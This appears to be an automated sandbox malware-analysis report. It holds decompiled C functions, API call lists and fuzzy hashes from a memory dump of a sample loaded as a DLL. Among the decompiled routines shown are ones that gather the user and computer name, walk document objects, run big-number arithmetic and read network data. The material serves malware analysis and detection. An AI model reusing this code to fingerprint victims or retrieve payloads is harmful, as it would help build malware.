GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 007D88D3
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 007D88E9

Part of subcall function 007D7B2E: memset.NTDLL ref: 007D7BAD

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 1334839b341af074be2917159f8912befea0835975f90ae40779e7d4546a8abd
Instruction ID: c51f9ad05882fd8d37cc777703043e9804d0ad3382cddd21890b51188002b993
Opcode Fuzzy Hash: 1334839b341af074be2917159f8912befea0835975f90ae40779e7d4546a8abd
Instruction Fuzzy Hash: 9021F9F150120AAFDB61EF69CC44E6A77FCEB083447018166E589CB751E638EE05CB61

Uniqueness

Uniqueness Score: -1.00%

Function 007D4D36, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E007D4D36(intOrPtr* __eax) {
				char _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_t1 =  &_v8; // 0x7d3a51
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t3 =  &_v8; // 0x7d3a51
					_t54 =  *_t3;
					_t102 =  *0x7dd27c; // 0x2bda5a8
					_t5 = _t102 + 0x7de038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t6 =  &_v8; // 0x7d3a51
					_t56 =  *_t6;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x7dc2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t21 =  &_v8; // 0x7d3a51
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67, _t21);
												if(_t117 < 0) {
													goto L16;
												}
												_t26 =  &_v8; // 0x7d3a51
												_t69 =  *_t26;
												_t108 =  *0x7dd27c; // 0x2bda5a8
												_t28 = _t108 + 0x7de0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x7dd27c; // 0x2bda5a8
														_t33 = _t78 + 0x7de078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t40 =  &_v8; // 0x7d3a51
												_t71 =  *_t40;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x007d4d3b
0x007d4d41
0x007d4d45
0x007d4d49
0x007d4d4f
0x007d4d55
0x007d4d55
0x007d4d5e
0x007d4d64
0x007d4d6e
0x007d4d70
0x007d4d70
0x007d4d76
0x007d4d7b
0x007d4d86
0x007d4d8e
0x007d4d91
0x007d4eb4
0x007d4d97
0x007d4d97
0x007d4da4
0x007d4daa
0x007d4db0
0x007d4db4
0x007d4dba
0x007d4dc7
0x007d4dcb
0x007d4dd1
0x007d4dd4
0x007d4dda
0x007d4de0
0x007d4de6
0x007d4de9
0x007d4dec
0x007d4df2
0x007d4df2
0x007d4dfb
0x007d4e01
0x007d4e02
0x007d4e05
0x007d4e06
0x007d4e07
0x007d4e0f
0x007d4e10
0x007d4e11
0x007d4e13
0x007d4e17
0x007d4e1b
0x00000000
0x00000000
0x007d4e21
0x007d4e21
0x007d4e2a
0x007d4e30
0x007d4e3a
0x007d4e3e
0x007d4e40
0x007d4e4d
0x007d4e51
0x007d4e59
0x007d4e5e
0x007d4e70
0x007d4e72
0x007d4e78
0x007d4e78
0x007d4e81
0x007d4e81
0x007d4e83
0x007d4e89
0x007d4e89
0x007d4e8c
0x007d4e8c
0x007d4e92
0x007d4e95
0x007d4e9e
0x00000000
0x00000000
0x00000000
0x007d4e9e
0x007d4df2
0x007d4dec
0x007d4dd4
0x007d4ea4
0x007d4ea4
0x007d4eaa
0x007d4eaa
0x007d4eb0
0x007d4eb0
0x007d4eb9
0x007d4ebf
0x007d4ebf
0x007d4d7b
0x007d4ec8

APIs

SysAllocString.OLEAUT32(007DC2B0), ref: 007D4D86
lstrcmpW.KERNEL32(00000000,0076006F), ref: 007D4E68
SysFreeString.OLEAUT32(00000000), ref: 007D4E81
SysFreeString.OLEAUT32(?), ref: 007D4EB0

Strings

Q:}, xrefs: 007D4D41, 007D4D55, 007D4D70, 007D4DF2, 007D4E21, 007D4E8C, 007D4D44, 007D4D6B, 007D4D75, 007D4DF5, 007D4E37, 007D4E91

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: String$Free$Alloclstrcmp
String ID: Q:}
API String ID: 1885612795-2569162349
Opcode ID: 87916bd25de6047ff9d431538d61644b29b42956495f2e5d248642ee1bcb0f55
Instruction ID: 71c8b4222bc7857aafe7f42e7819ec7c39ff0b64d0b2f0fdfe1dc3475ae78eef
Opcode Fuzzy Hash: 87916bd25de6047ff9d431538d61644b29b42956495f2e5d248642ee1bcb0f55
Instruction Fuzzy Hash: 5F515E71D00519EFCB11DFA8C9888AEB7B9FF88704B148695E915EB310D775AD01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 007D9525, Relevance: 7.6, APIs: 5, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E007D9525() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t63;
				short* _t66;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t63 = E007D3727(_v12 + _t43 + 2 << 2);
						if(_t63 != 0) {
							_t47 = _v12;
							_t66 = _t63 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t66,  &_v8) == 0) {
								L7:
								E007D6EF8(_t63);
							} else {
								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x7d978f
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t63[_t57] = 0;
										_v16 = _t63;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x007d9533
0x007d9536
0x007d9539
0x007d953f
0x007d9544
0x007d954a
0x007d9552
0x007d9555
0x007d955b
0x007d9560
0x007d956d
0x007d957a
0x007d957e
0x007d9580
0x007d9584
0x007d9587
0x007d9597
0x007d95e9
0x007d95ea
0x007d9599
0x007d959c
0x007d95a3
0x007d95a6
0x007d95b9
0x00000000
0x007d95bb
0x007d95be
0x007d95c3
0x007d95d1
0x007d95d4
0x007d95dc
0x007d95df
0x00000000
0x007d95e1
0x007d95e1
0x007d95e4
0x007d95e4
0x007d95df
0x007d95b9
0x007d95ef
0x007d95f0
0x007d9560
0x007d95f6

APIs

GetUserNameW.ADVAPI32(00000000,007D978D), ref: 007D9539
GetComputerNameW.KERNEL32(00000000,007D978D), ref: 007D9555

Part of subcall function 007D3727: RtlAllocateHeap.NTDLL(00000000,00000000,007D43D1), ref: 007D3733

GetUserNameW.ADVAPI32(00000000,007D978D), ref: 007D958F
GetComputerNameW.KERNEL32(007D978D,?), ref: 007D95B1
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,007D978D,00000000,007D978F,00000000,00000000,?,?,007D978D), ref: 007D95D4

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: 423fda2bdfa28cc8193d6496a704faba8cf126f5c3b47981b36e75fe3aff02fb
Instruction ID: b523858dc8cc8f89c78e062b9f897a05a765686742058079f7950af9395fae39
Opcode Fuzzy Hash: 423fda2bdfa28cc8193d6496a704faba8cf126f5c3b47981b36e75fe3aff02fb
Instruction Fuzzy Hash: 7821D976900109FBCB11DFE9D985CEEBBB8EE44340B5440ABE502E7241E6349F54DB60

Uniqueness

Uniqueness Score: -1.00%

Function 007D7CCB, Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E007D7CCB(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E007D14E8(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E007DA953(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x7dd130() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x007d7ccb
0x007d7cd8
0x007d7cda
0x007d7d3d
0x00000000
0x007d7d3d
0x007d7cf2
0x007d7cf9
0x007d7d05
0x007d7d0a
0x007d7d0c
0x007d7d0e
0x007d7d10
0x007d7d12
0x007d7d14
0x007d7d20
0x007d7d30
0x00000000
0x007d7d22
0x007d7d22
0x007d7d29
0x007d7d36
0x007d7d36
0x007d7d36
0x007d7d29
0x007d7d20
0x007d7d3b
0x00000000
0x00000000
0x007d7d41

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,007D461F,?,?,00000000,00000000), ref: 007D7D05
ResetEvent.KERNEL32(?), ref: 007D7D0A
GetLastError.KERNEL32 ref: 007D7D22
GetLastError.KERNEL32(?,?,00000102,007D461F,?,?,00000000,00000000), ref: 007D7D3D

Part of subcall function 007D14E8: lstrlen.KERNEL32(00000000,00000008,?,73B74D40,?,?,007D7CEA,?,?,?,?,00000102,007D461F,?,?,00000000), ref: 007D14F4
Part of subcall function 007D14E8: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,007D7CEA,?,?,?,?,00000102,007D461F,?), ref: 007D1552
Part of subcall function 007D14E8: lstrcpy.KERNEL32(00000000,00000000), ref: 007D1562

SetEvent.KERNEL32(?), ref: 007D7D30

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
String ID:
API String ID: 1449191863-0
Opcode ID: 17d90923a547cc07b3df56b5b33e6ed57955c39b91cd8dfddabc86a6f44049f6
Instruction ID: 5ca5252cc3e73d511cf67821b7a18cb03d598af88817d499caab8b9174a3bfc6
Opcode Fuzzy Hash: 17d90923a547cc07b3df56b5b33e6ed57955c39b91cd8dfddabc86a6f44049f6
Instruction Fuzzy Hash: 27016D31209211AAEA356F71DC44F2BB7B9FF54361F208B27F455D12E0E629EC04DA65

Uniqueness

Uniqueness Score: -1.00%

Function 007D6D76, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E007D6D76(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E007D8FAC(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E007D8CF6(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E007D3F82(_t101,  &_v236, _a8, _t96 - _t81);
					E007D3F82(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E007D8CF6(_t101,  &E007DD1B0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E007D8CF6(_a16, _a4);
						E007D862E(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L007DB068();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L007DB062();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E007D50CB(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E007D16D8(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E007D906C(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E007DD1B0) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x007d6d79
0x007d6d85
0x007d6d8b
0x007d6d90
0x007d6d94
0x007d6ef1
0x007d6ef5
0x007d6ef5
0x007d6d9a
0x007d6d9e
0x007d6da4
0x007d6da5
0x007d6db0
0x007d6db6
0x007d6dbb
0x007d6dbe
0x007d6dd8
0x007d6de4
0x007d6ded
0x007d6df7
0x007d6dfc
0x007d6dfe
0x007d6e01
0x007d6eaf
0x007d6eb5
0x007d6ec6
0x007d6ed9
0x007d6ee9
0x00000000
0x007d6eee
0x007d6e0a
0x007d6e11
0x007d6e15
0x007d6e1b
0x007d6e1d
0x007d6e1f
0x007d6e21
0x007d6e23
0x007d6e2d
0x007d6e32
0x007d6e34
0x007d6e36
0x007d6e37
0x007d6e38
0x007d6e39
0x007d6e40
0x007d6e47
0x007d6e4a
0x007d6e4a
0x007d6e17
0x007d6e17
0x007d6e17
0x007d6e52
0x007d6e5a
0x007d6e63
0x007d6e68
0x007d6e68
0x007d6e6d
0x00000000
0x00000000
0x007d6e6f
0x007d6e72
0x007d6e7c
0x00000000
0x00000000
0x007d6e7e
0x007d6e7e
0x007d6e88
0x007d6e68
0x007d6e6d
0x00000000
0x00000000
0x00000000
0x007d6e6d
0x007d6e92
0x007d6e95
0x007d6e98
0x007d6e9f
0x007d6e9f
0x007d6eac
0x00000000
0x007d6eac
0x007d6da7
0x007d6dab
0x007d6dac
0x007d6dae
0x00000000
0x00000000
0x00000000
0x007d6dae
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 007D6E23
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 007D6E39
memset.NTDLL ref: 007D6ED9
memset.NTDLL ref: 007D6EE9

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 5cde19338c9f3f669801bc8a39e93994dab59f3cb8adf7bbd5cdf9d6dd612299
Instruction ID: 467362e41143bb5d5e9e18fcba93fc6e83fc0b6eb2d5a6898c03bb9cf64e54b0
Opcode Fuzzy Hash: 5cde19338c9f3f669801bc8a39e93994dab59f3cb8adf7bbd5cdf9d6dd612299
Instruction Fuzzy Hash: 5141A271A00219EBDB109FA8CC45BEE7775FF44310F10852BF91AAB381DB78AE548B51

Uniqueness

Uniqueness Score: -1.00%

Function 007DA953, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000008,73B74D40), ref: 007DA965

Part of subcall function 007D3727: RtlAllocateHeap.NTDLL(00000000,00000000,007D43D1), ref: 007D3733

ResetEvent.KERNEL32(?), ref: 007DA9D9
GetLastError.KERNEL32 ref: 007DA9FC
GetLastError.KERNEL32 ref: 007DAAA7

Part of subcall function 007D6EF8: RtlFreeHeap.NTDLL(00000000,00000000,007D4499,00000000,?,?,00000000), ref: 007D6F04

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID:
API String ID: 943265810-0
Opcode ID: c7fcbea96a58b0f83b6ed75a11c26918af433c654c2f2515e107597c59b21597
Instruction ID: e655b60892e1a0c45c787c4ff3c19d46344ca8afc586edc60a300822cf8217ec
Opcode Fuzzy Hash: c7fcbea96a58b0f83b6ed75a11c26918af433c654c2f2515e107597c59b21597
Instruction Fuzzy Hash: D5417C71600204BFD7319FA5CD49EAB7BBDFB85704F108A2BF142E12A0E779A944DB61

Uniqueness

Uniqueness Score: -1.00%

Function 007D54D2, Relevance: 6.1, APIs: 4, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E007D54D2(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x7dd134() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x7dd168(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E007D3727(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x7dd134() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E007D6CC8( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E007D6EF8(_v16);
										if(_t64 == 0) {
											_t64 = E007D873A(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E007D6CC8( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E007D9956(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}

0x007d54d2
0x007d54d3
0x007d54d9
0x007d54e4
0x007d54e4
0x007d54e6
0x007d8d5b
0x007d8d60
0x007d8d62
0x007d8d67
0x007d8d68
0x007d8d6d
0x007d8d6e
0x007d8d79
0x007d8daa
0x007d8daf
0x007d8e72
0x007d8db5
0x007d8dbc
0x007d8dc4
0x007d8e6f
0x007d8dca
0x007d8dcf
0x007d8dd6
0x007d8dd9
0x007d8e61
0x007d8ddf
0x007d8ddf
0x007d8de1
0x007d8de7
0x007d8de8
0x007d8de8
0x007d8deb
0x007d8dee
0x007d8df4
0x007d8df9
0x007d8dfa
0x007d8dff
0x007d8e02
0x007d8e0d
0x00000000
0x00000000
0x007d8e15
0x007d8e1d
0x007d8e29
0x007d8e2d
0x007d8e2f
0x007d8e34
0x00000000
0x00000000
0x007d8e34
0x007d8e2d
0x007d8e46
0x007d8e49
0x007d8e50
0x007d8e5b
0x007d8e5b
0x00000000
0x007d8e36
0x007d8e36
0x007d8e3b
0x007d8e3d
0x007d8e3e
0x007d8e41
0x00000000
0x007d8e41
0x00000000
0x007d8e3b
0x007d8de8
0x007d8e62
0x007d8e62
0x007d8e68
0x007d8e68
0x007d8dc4
0x007d8d7b
0x007d8d81
0x007d8d89
0x007d8da2
0x007d8da4
0x00000000
0x00000000
0x007d8d8b
0x007d8d95
0x007d8d99
0x007d8d9f
0x00000000
0x007d8d9f
0x007d8d99
0x007d8d89
0x007d8e7b
0x007d54db
0x007d54db
0x007d54e2
0x007d54ed
0x00000000
0x00000000
0x00000000
0x007d54e2

APIs

ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,73BB81D0), ref: 007D8D62
GetLastError.KERNEL32(?,?,?,00000000,73BB81D0), ref: 007D8D7B
ResetEvent.KERNEL32(?), ref: 007D8DF4
GetLastError.KERNEL32 ref: 007D8E0F

Part of subcall function 007D9956: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,73BB81D0), ref: 007D996D
Part of subcall function 007D9956: SetEvent.KERNEL32(?), ref: 007D997D

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: Event$ErrorLastReset$ObjectSingleWait
String ID:
API String ID: 1123145548-0
Opcode ID: ac5d424b59bec325fa4851fee590a396d3843ec94bbfca088ea4e5fb44157ac5
Instruction ID: 6505b27733c385b42b8644d6e8eca2d94fecf368d81fad7c56c353fb86b9d847
Opcode Fuzzy Hash: ac5d424b59bec325fa4851fee590a396d3843ec94bbfca088ea4e5fb44157ac5
Instruction Fuzzy Hash: DF410532600604EFDB619BA4CC44A6FB7B9EF88360F24456BE155E73A0EF38ED418B11

Uniqueness

Uniqueness Score: -1.00%

Function 007D3813, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 97stringCOMMON

Download Yara Rule

APIs

lstrcmp.KERNEL32(00000001,00000001), ref: 007D38C4
lstrlen.KERNEL32(00000001,007DC2B8,00000028,007D434F,00000000), ref: 007D38CF

Strings

(OC}, xrefs: 007D3894
OC}, xrefs: 007D3891

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: lstrcmplstrlen
String ID: (OC}$OC}
API String ID: 898299967-3557432437
